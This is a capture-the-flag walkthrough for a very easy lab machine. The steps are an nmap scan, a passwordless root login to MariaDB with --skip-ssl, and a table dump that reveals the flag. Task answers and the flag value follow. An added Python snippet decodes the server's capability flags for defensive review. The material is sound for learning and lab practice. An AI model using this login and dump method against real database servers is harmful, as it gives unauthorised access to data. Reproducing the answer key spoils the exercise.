Sequel
- Difficulty: Very easy
🔎 Solution
With the target IP in hand I ran a full-port, fast service/version scan to discover any database services:
> nmap -p- -sV -sC --min-rate 5000 10.129.2.30
PORT STATE SERVICE VERSION
3306/tcp open mysql?
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 66
| Capabilities flags: 63486
| Some Capabilities: ConnectWithDatabase, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, InteractiveClient, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, LongColumnFlag, SupportsTransactions, IgnoreSigpipes, Speaks41ProtocolNew, FoundRows, ODBCClient, SupportsCompression, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: *1WE2h8{&Fp"RWA}uS}<
|_ Auth Plugin Name: mysql_native_password
The scan identified a database service on port 3306 and the banner indicates MariaDB 10.3.27 (reported as 5.5.5-10.3.27-MariaDB).
In CTF/lab scenarios it's common to find misconfigured MySQL/MariaDB instances where administrative accounts have weak or empty passwords.
I attempted to connect as root with a simple client command but received an SSL/TLS-related error:
> mysql -h 10.129.2.30 -u root
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
The client was insisting on TLS while the server didn't support it; adding --skip-ssl to the client command bypasses that client-side requirement and allowed me to connect as root without a password:
> mysql -h 10.129.2.30 -u root --skip-ssl
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 75
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
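The TLS error is already visible in the scan: decoding the handshake capability flags shows the SSL bit is not set. The following is an added example, not part of the original writeup. It assumes the number nmap prints as "Capabilities flags" is the lower 16 capability bits of the server handshake, and the function names are hypothetical.

```python
import re

# Lower 16 capability bits of the MySQL/MariaDB protocol-10 handshake, bit 0 first.
CAP_NAMES = [
    "CLIENT_LONG_PASSWORD", "CLIENT_FOUND_ROWS", "CLIENT_LONG_FLAG",
    "CLIENT_CONNECT_WITH_DB", "CLIENT_NO_SCHEMA", "CLIENT_COMPRESS",
    "CLIENT_ODBC", "CLIENT_LOCAL_FILES", "CLIENT_IGNORE_SPACE",
    "CLIENT_PROTOCOL_41", "CLIENT_INTERACTIVE", "CLIENT_SSL",
    "CLIENT_IGNORE_SIGPIPE", "CLIENT_TRANSACTIONS", "CLIENT_RESERVED",
    "CLIENT_SECURE_CONNECTION",
]

# Fields copied from the mysql-info block in the scan output above.
SCAN = """\
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Capabilities flags: 63486
|_  Auth Plugin Name: mysql_native_password
"""

def parse_mysql_info(text):
    """Return the 'Key: value' fields of an nmap mysql-info block."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^\|_?\s*([^:]+):\s*(.+)$", line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields

def decode_capabilities(value):
    """Names of the capability bits set in the 16-bit flags value."""
    return [name for bit, name in enumerate(CAP_NAMES) if value >> bit & 1]

def audit(text):
    """Decode the advertised capabilities and list what a defender should review."""
    caps = decode_capabilities(int(parse_mysql_info(text)["Capabilities flags"]))
    findings = []
    if "CLIENT_SSL" not in caps:
        findings.append("TLS not offered: sessions to this service are unencrypted")
    if "CLIENT_LOCAL_FILES" in caps:
        findings.append("LOAD DATA LOCAL advertised: review the local_infile setting")
    return caps, findings

if __name__ == "__main__":
    caps, findings = audit(SCAN)
    print(hex(63486), caps)
    print("\n".join(findings))
```

63486 is 0xF7FE, so every lower bit except CLIENT_LONG_PASSWORD (0x0001) and CLIENT_SSL (0x0800) is set, which matches the capability names nmap listed.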
Once in the MariaDB monitor I listed the available databases (remembering to terminate SQL statements with ;):
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.273 sec)
There were four databases; three (information_schema, mysql, performance_schema) are system databases created by MySQL/MariaDB, while htb is a user-created database, so I switched to it:
MariaDB [(none)]> USE htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
I enumerated the tables in htb and found config and users.
A full table dump with SELECT * FROM <table_name>; on config returned a row containing the flag:
MariaDB [htb]> SELECT * FROM config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.270 sec)
✏️ Task answers
Task 1: During our scan, which port do we find serving MySQL?
3306
Task 2: What community-developed MySQL version is the target running?
MariaDB
Task 3: When using the MySQL command line client, what switch do we need to use in order to specify a login username?
-u
Task 4: Which username allows us to log into this MariaDB instance without providing a password?
root
Task 5: In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
*
Task 6: In SQL, what symbol do we need to end each query with?
;
Task 7: There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?
htb
🚩Flag
7b4bec00d1a39e3dd4e021ec3d915da8